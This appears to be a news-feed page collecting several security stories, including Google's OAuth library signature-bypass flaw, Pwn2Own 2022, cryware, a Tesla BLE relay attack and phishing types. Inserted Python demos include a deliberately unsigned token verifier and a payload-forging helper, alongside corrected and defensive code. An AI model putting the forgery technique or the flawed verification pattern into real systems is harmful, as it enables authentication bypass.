In this video for Help Net Security, Jack Naglieri, CEO of Panther Labs, discusses a recent report which found that 80% of security engineers are experiencing burnout.
Google addressed a high-severity flaw in its OAuth client library for Java that could allow attackers with a compromised token to deploy malicious payloads.
Google addressed a high-severity authentication bypass flaw in the Google OAuth Client Library for Java, tracked as CVE-2021-22573 (CVSS score 8.7), that could be exploited by an attacker with a compromised token to deploy malicious payloads.
The Google OAuth Client Library for Java is designed to work with any OAuth service on the web, not just with Google APIs. The library is built on the Google HTTP Client Library for Java, and it supports Java 7 (or higher) standard (SE) and enterprise (EE), Android 4.0 (or higher), and Google App Engine.
The root cause of the issue is that the IDToken verifier does not verify whether the token is properly signed. This means that an attacker can serve a malicious payload that doesn’t come from a trusted provider.
“The vulnerability is that IDToken verifier does not verify if token is properly signed. Signature verification makes sure that the token’s payload comes from valid provider, not from someone else. An attacker can provide a compromised token with custom payload.” reads the description published by NIST. “The token will pass the validation on the client side. We recommend upgrading to version 1.33.3 or above”
The vulnerability was reported by the security researcher Tamjid Al Rahat on March 12, and the report was awarded $5,000 as part of the company’s bug bounty program. Google addressed the issue with the release of version 1.33.3 in April.
Users of the Google OAuth Client Library for Java are recommended to upgrade to version 1.33.3 or later.
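The bug class is easy to reproduce: a verifier that checks issuer, audience and expiry but never the signature will accept any payload an attacker pastes in front of a signature copied from a genuine token. The side-by-side below is an added example, not the Java library's code; it uses HS256 with a constructed shared key as a stand-in for the RSA signatures an OpenID provider issues, since the ordering of the checks, not the algorithm, is the point.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_token(claims: dict, key: bytes) -> str:
    """Issue a compact JWS (HS256 stand-in for the provider's RS256 signature)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def forge_payload(token: str, new_claims: dict) -> str:
    """Test fixture: swap the payload but keep the original signature, as the NIST text describes."""
    header, _payload, sig = token.split(".")
    return f"{header}.{_b64url(json.dumps(new_claims).encode())}.{sig}"


def _check_claims(payload_b64: str, issuer: str, audience: str, now: int) -> Optional[dict]:
    claims = json.loads(_b64url_decode(payload_b64))
    if claims.get("iss") != issuer or claims.get("aud") != audience:
        return None
    if int(claims.get("exp", 0)) <= now:
        return None
    return claims


def verify_unsigned(token: str, issuer: str, audience: str, now: int) -> Optional[dict]:
    """The flawed pattern: issuer/audience/expiry are checked, the signature never is."""
    _header, payload, _sig = token.split(".")
    return _check_claims(payload, issuer, audience, now)


def verify_signed(token: str, key: bytes, issuer: str, audience: str, now: int) -> Optional[dict]:
    """The corrected order: pin the algorithm, verify the signature, then read any claim."""
    try:
        header, payload, sig = token.split(".")
    except ValueError:
        return None
    if json.loads(_b64url_decode(header)).get("alg") != "HS256":
        return None                                  # no 'none', no algorithm switching
    expected = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        return None                                  # payload is untrusted until this passes
    return _check_claims(payload, issuer, audience, now)
```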
White hat hackers earned a total of $800,000 on the first day of the Pwn2Own Vancouver 2022, $450,000 for exploits targeting Microsoft Teams.
The Pwn2Own Vancouver 2022 hacking contest has begun; it is the 15th edition of this important event organized by Trend Micro’s Zero Day Initiative (ZDI). This year, 17 contestants are attempting to exploit 21 targets across multiple categories.
During the first day of the event, white hat hackers earned a total of $800,000, a record for the first day of this contest, including $450,000 for successful exploits targeting Microsoft Teams.
All the attempts made during the first day were successful; the participants exploited a total of 16 flaws affecting Microsoft Teams, Oracle VirtualBox, Firefox, Windows 11, Ubuntu, and Safari.
SUCCESS – Hector “p3rr0” Peralta was able to demonstrate an improper configuration against Microsoft Teams. He earns $150,000 and 15 Master of Pwn points.
SUCCESS – Masato Kinugawa was able to execute a 3-bug chain of injection, misconfiguration and sandbox escape against Microsoft Teams, earning $150,000 and 15 Master of Pwn points.
SUCCESS – Daniel Lim Wee Soong (@daniellimws), Poh Jia Hao (@Chocologicall), Li Jiantao (@CurseRed) & Ngo Wei Lin (@Creastery) of STAR Labs successfully demonstrated their zero-click exploit of 2 bugs (injection and arbitrary file write) on Microsoft Teams. They earn $150,000 and 15 Master of Pwn points.
Manfred Paul (@_manfp) successfully demonstrated the exploitation of prototype pollution and improper input validation on Mozilla Firefox. Paul earned $100,000 and 10 Master of Pwn points.
Paul also exploited an out-of-bounds write issue on Apple Safari and earned $50,000 and 5 additional Master of Pwn points.
Microsoft researchers warn of the rising threat of cryware targeting non-custodial cryptocurrency wallets, also known as hot wallets.
Microsoft warns of the rise of cryware, malicious software used to steal information and funds from non-custodial cryptocurrency wallets, also known as hot wallets. Data stolen by this kind of malware includes private keys, seed phrases, and wallet addresses, which could be used by threat actors to initiate fraudulent transactions.
“Cryware are information stealers that collect and exfiltrate data directly from non-custodial cryptocurrency wallets, also known as hot wallets. Because hot wallets, unlike custodial wallets, are stored locally on a device and provide easier access to cryptographic keys needed to perform transactions, more and more threats are targeting them.” reads the post published by Microsoft.
The experts pointed out that the theft of cryptocurrency is irreversible: unlike credit card and other financial transactions, there is no mechanism to reverse fraudulent transfers.
This cryware is automating the scanning process for hot wallet data exposed online.
The increasing popularity of cryptocurrency is attracting cybercrime that is using different means to target the cryptocurrency industry. Below is a list of threats that are currently leveraging cryptocurrency:
Cryptojackers. One of the threat types that surfaced and thrived since the introduction of cryptocurrency, cryptojackers are mining malware that hijacks and consumes a target’s device resources for the former’s gain and without the latter’s knowledge or consent. Based on our threat data, we saw millions of cryptojacker encounters in the last year.
Ransomware. Some threat actors prefer cryptocurrency for ransom payments because it provides transaction anonymity, thus reducing the chances of being discovered.
Password and info stealers. Apart from sign-in credentials, system information, and keystrokes, many info stealers are now adding hot wallet data to the list of information they search for and exfiltrate.
ClipBanker trojans. Another type of info stealer, this malware checks the user’s clipboard and steals banking information or other sensitive data a user copies. ClipBanker trojans are also now expanding their monitoring to include cryptocurrency addresses.
Microsoft described the techniques used by crooks to steal hot wallet data, including clipping and switching, memory dumping, wallet file theft, phishing sites and fake applications, and keylogging.
Experts also warn of scams and other social engineering attacks that cybercriminals use to trick victims into sending funds to the attackers’ wallets.
Microsoft recommends that users and organizations lock hot wallets when not actively trading, disconnect sites connected to the wallet, never store private keys in plaintext, ensure that browser sessions are terminated after every transaction, enable MFA for wallet authentication, double-check hot wallet transactions and approvals, and use hardware wallets to store private keys offline.
Security researchers at the NCC Group have developed a tool to carry out a Bluetooth Low Energy (BLE) relay attack that bypasses all existing protections to authenticate on target devices.
BLE technology is used in a wide spectrum of products, from electronics like laptops, mobile phones, smart locks, and building access control systems to cars like Tesla Model 3 and Model Y.
Pushing out fixes for this security problem is complicated, and even if the response is immediate and coordinated, it would still take a long time for the updates to trickle to impacted products.
How the attack works
In this type of relay attack, an adversary intercepts and can manipulate the communication between two parties, such as the key fob that unlocks and operates the car and the vehicle itself.
This places the attacker in the middle of the two ends of the communication, allowing them to relay the signal as if they were standing right next to the car.
Products that rely on BLE for proximity-based authentication protect against known relay attack methods by introducing checks based on precise amounts of latency and also link-layer encryption.
NCC Group has developed a tool that operates at the link layer with a latency of 8 ms, which is within the accepted 30 ms range for a GATT (Generic ATTribute Profile) response.
“Since this relay attack operates at the link layer, it can forward encrypted link layer PDUs. It is also capable of detecting encrypted changes to connection parameters (such as connection interval, WinOffset, PHY mode, and channel map) and continuing to relay connections through parameter changes. Thus, neither link layer encryption nor encrypted connection parameter changes are defences against this type of relay attack.” – NCC Group
According to Sultan Qasim Khan, a senior security consultant at NCC Group, it takes about ten seconds to run the attack and it can be repeated endlessly.
Both the Tesla Model 3 and Model Y use a BLE-based entry system, so NCC’s attack could be used to unlock and start the cars.
While technical details behind this new BLE relay attack have not been published, the researchers say that they tested the method on a Tesla Model 3 from 2020 using an iPhone 13 mini running version 4.6.1-891 of the Tesla app.
“NCC Group was able to use this newly developed relay attack tool to unlock and operate the vehicle while the iPhone was outside the BLE range of the vehicle” – NCC Group
During the experiment, they were able to deliver to the car the communication from the iPhone via two relay devices, one placed seven meters away from the phone, the other sitting three meters from the car. The distance between the phone and the car was 25 meters.
The experiment was also replicated successfully on a Tesla Model Y from 2021, since it uses similar technologies. Below is a demonstration of the attack:
These findings were reported to Tesla on April 21st. A week later, the company responded by saying “that relay attacks are a known limitation of the passive entry system.”
The researchers also notified Spectrum Brands, the parent company behind Kwikset (makers of the Kevo line of smart locks).
What can be done
NCC Group’s research on this new proximity attack is available in three separate advisories: one for BLE in general, one for Tesla cars, and another for Kwikset/Weiser smart locks, each illustrating the issue on the tested devices and how it affects a larger set of products from other vendors.
The Bluetooth Core Specification warns device makers about relay attacks and notes that proximity-based authentication shouldn’t be used for valuable assets.
This leaves users with few possibilities, one being to disable it, if possible, and switch to an alternative authentication method that requires user interaction.
Another solution would be for makers to adopt a distance bounding solution such as UWB (ultra-wideband) radio technology instead of Bluetooth.
Tesla owners are encouraged to use the ‘PIN to Drive’ feature, so even if their car is unlocked, at least the attacker won’t be able to drive away with it.
Additionally, disabling the passive entry functionality in the mobile app when the phone is stationary would make the relay attack impossible to carry out.
If none of the above is possible on your device, keep in mind the possibility of relay attacks and implement additional protection measures accordingly.
Phishing is among the biggest cyber threats facing organisations. According to Proofpoint’s 2021 State of the Phish Report, more than 80% of organisations fell victim to a phishing attack last year.
One of the most frustrating things about this is that most people know what phishing is and how it works, but many still get caught out.
The growing sophistication of phishing scams has contributed to that. They might still have the same objective – to steal our personal data or infect our devices – but there are now countless ways to do that.
In this blog, we look at five of the most common types of phishing email to help you spot the signs of a scam.
1. Email phishing
Most phishing attacks are sent by email. The crook will register a fake domain that mimics a genuine organisation and send thousands of generic requests.
The fake domain often involves character substitution, like using ‘r’ and ‘n’ next to each other to create ‘rn’ instead of ‘m’.
In other cases, the fraudsters create a unique domain that includes the legitimate organisation’s name in the URL. The example below is sent from ‘olivia@amazonsupport.com’.
The recipient might see the word ‘Amazon’ in the sender’s address and assume that it is a genuine email.
There are many ways to spot a phishing email, but as a general rule, you should always check the email address of a message that asks you to click a link or download an attachment.
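A small detector for the two sender-domain tricks described above (confusable character substitution, and a brand name embedded in an unrelated domain), written from the defender's side as an added example rather than code from the original post. The brand allow-list and sample addresses are constructed, and the confusable table is deliberately a short subset.

```python
"""Flag sender domains that imitate a watched brand (added example)."""

# Constructed allow-list: brand keyword -> registrable domains it really uses
BRANDS = {
    "amazon": {"amazon.com", "amazon.co.uk"},
    "paypal": {"paypal.com"},
}

# Visually confusable sequences phishers swap in for a letter (short subset)
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("cl", "d")]


def registrable_domain(host):
    """Crude registrable-domain extraction (constructed; a real deployment
    would use a public-suffix list)."""
    parts = host.lower().strip(".").split(".")
    if len(parts) >= 3 and parts[-2] in {"co", "com", "org"}:
        return ".".join(parts[-3:])  # e.g. amazon.co.uk
    return ".".join(parts[-2:])


def normalise(label):
    """Collapse confusable sequences so 'arnazon' compares equal to 'amazon'."""
    for lookalike, real in CONFUSABLES:
        label = label.replace(lookalike, real)
    return label


def check_sender(address):
    """Return (verdict, reason) for one From: address.

    Verdicts: 'ok' (registered brand domain), 'lookalike' (confusable
    substitution), 'brand-in-domain' (brand name inside a foreign domain),
    'unknown' (no watched brand involved)."""
    host = address.rsplit("@", 1)[-1]
    domain = registrable_domain(host)
    label = domain.split(".")[0]
    for brand, legit in BRANDS.items():
        if domain in legit:
            return ("ok", f"sent from registered domain {domain}")
        if label != brand and normalise(label) == brand:
            return ("lookalike",
                    f"'{label}' normalises to '{brand}' but is not a {brand} domain")
        if brand in label:
            return ("brand-in-domain",
                    f"'{domain}' contains '{brand}' but is not a registered {brand} domain")
    return ("unknown", "no watched brand in sender domain")
```

Only the address's domain is examined; the display name (the part a mail client shows most prominently) is a separate check.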
2. Spear phishing
There are two other, more sophisticated, types of phishing involving email.
The first, spear phishing, describes malicious emails sent to a specific person. Criminals who do this will already have some or all of the following information about the victim:
Their name;
Place of employment;
Job title;
Email address; and
Specific information about their job role.
You can see in the example below how much more convincing spear phishing emails are compared to standard scams.
The fraudster has the wherewithal to address the individual by name and (presumably) knows that their job role involves making bank transfers on behalf of the company.
The informality of the email also suggests that the sender is a native English speaker, and creates the sense that this is a real message rather than a template.
3. Whaling
Whaling attacks are even more targeted, taking aim at senior executives. Although the end goal of whaling is the same as any other kind of phishing attack, the technique tends to be a lot subtler.
Tricks such as fake links and malicious URLs aren’t helpful in this instance, as criminals are attempting to imitate senior staff.
Whaling emails also commonly use the pretext of a busy CEO who wants an employee to do them a favour.
Emails such as the above might not be as sophisticated as spear phishing emails, but they play on employees’ willingness to follow instructions from their boss. Recipients might suspect that something is amiss but are too afraid to confront the sender to suggest that they are being unprofessional.
4. Smishing and vishing
With both smishing and vishing, telephones replace emails as the method of communication.
Smishing involves criminals sending text messages (the content of which is much the same as with email phishing), and vishing involves a telephone conversation.
One of the most common smishing pretexts is a message supposedly from your bank alerting you to suspicious activity.
In this example, the message suggests that you have been the victim of fraud and tells you to follow a link to prevent further damage. However, the link directs the recipient to a website controlled by the fraudster and designed to capture your banking details.
5. Angler phishing
A relatively new attack vector, social media offers several ways for criminals to trick people. Fake URLs; cloned websites, posts, and tweets; and instant messaging (which is essentially the same as smishing) can all be used to persuade people to divulge sensitive information or download malware.
Alternatively, criminals can use the data that people willingly post on social media to create highly targeted attacks.
As this example demonstrates, angler phishing is often made possible by the number of people contacting organisations directly on social media with complaints.
Organisations often use these as an opportunity to mitigate the damage – usually by giving the individual a refund.
However, scammers are adept at hijacking responses and asking the customer to provide their personal details. They are seemingly doing this to facilitate some form of compensation, but it is instead done to compromise their accounts.
Your employees are your last line of defence
Organisations can mitigate the risk of phishing with technological means, such as spam filters, but these have consistently proven to be unreliable.
Malicious emails will still get through regularly, and when that happens, the only thing preventing your organisation from a breach is your employees’ ability to detect their fraudulent nature and respond appropriately.
Our Phishing Staff Awareness Course helps employees do just that, as well as explaining what happens when people fall victim and how they can mitigate the threat of an attack.
Researchers devised an attack technique to tamper with the firmware and execute malware on the Bluetooth chip while an iPhone is “off.”
A team of researchers from the Secure Mobile Networking Lab (SEEMOO) at the Technical University of Darmstadt demonstrated a technique to tamper with the firmware and load malware onto a chip while an iPhone is “OFF.”
Experts pointed out that when an iPhone is turned off, most wireless chips (Bluetooth, Near Field Communication (NFC), and Ultra-wideband (UWB)) continue to operate.
“The Bluetooth and UWB chips are hardwired to the Secure Element (SE) in the NFC chip, storing secrets that should be available in LPM,” the researchers said.
Low-Power Mode (LPM) was introduced with iOS 15 and is supported by iPhone 11, iPhone 12, and iPhone 13 devices.
Many users are not aware of these features, even if they know that their iPhone remains locatable after it has been turned off.
The experts mentioned the case of a user-initiated shutdown during which the iPhone remains locatable via the Find My network.
The researchers focused their analysis on how Apple implements standalone wireless features while iOS is not running, and they also discovered that the wireless chips have direct access to the secure element.
“LPM [Low Power Mode] support is implemented in hardware. The Power Management Unit (PMU) can turn on chips individually. The Bluetooth and UWB chips are hardwired to the Secure Element (SE) in the NFC chip, storing secrets that should be available in LPM. Since LPM support is implemented in hardware, it cannot be removed by changing software components.” reads the paper published by the researchers. “As a result, on modern iPhones, wireless chips can no longer be trusted to be turned off after shutdown. This poses a new threat model. Previous work only considered that journalists are not safe against espionage when enabling airplane mode in case their smartphones were compromised”
The experts explained that a threat actor has different options to tamper with firmware, depending on their preconditions. Unlike the NFC and UWB chips, the Bluetooth firmware is neither signed nor encrypted, opening the door to modification.
An attacker with privileged access can exploit this weakness to develop malware that runs on the iPhone's Bluetooth chip even when the device is off.
“The current LPM implementation on Apple iPhones is opaque and adds new threats. Since LPM support is based on the iPhone’s hardware, it cannot be removed with system updates. Thus, it has a long-lasting effect on the overall iOS security model.” concludes the paper. “To the best of our knowledge, we are the first who looked into undocumented LPM features introduced in iOS 15 and uncover various issues. Design of LPM features seems to be mostly driven by functionality, without considering threats outside of the intended applications. Find My after power off turns shutdown iPhones into tracking devices by design, and the implementation within the Bluetooth firmware is not secured against manipulation. Tracking properties could stealthily be changed by attackers with system-level access.”
The researchers will present the results of their study at the ACM Conference on Security and Privacy in Wireless and Mobile Networks (WiSec 2022).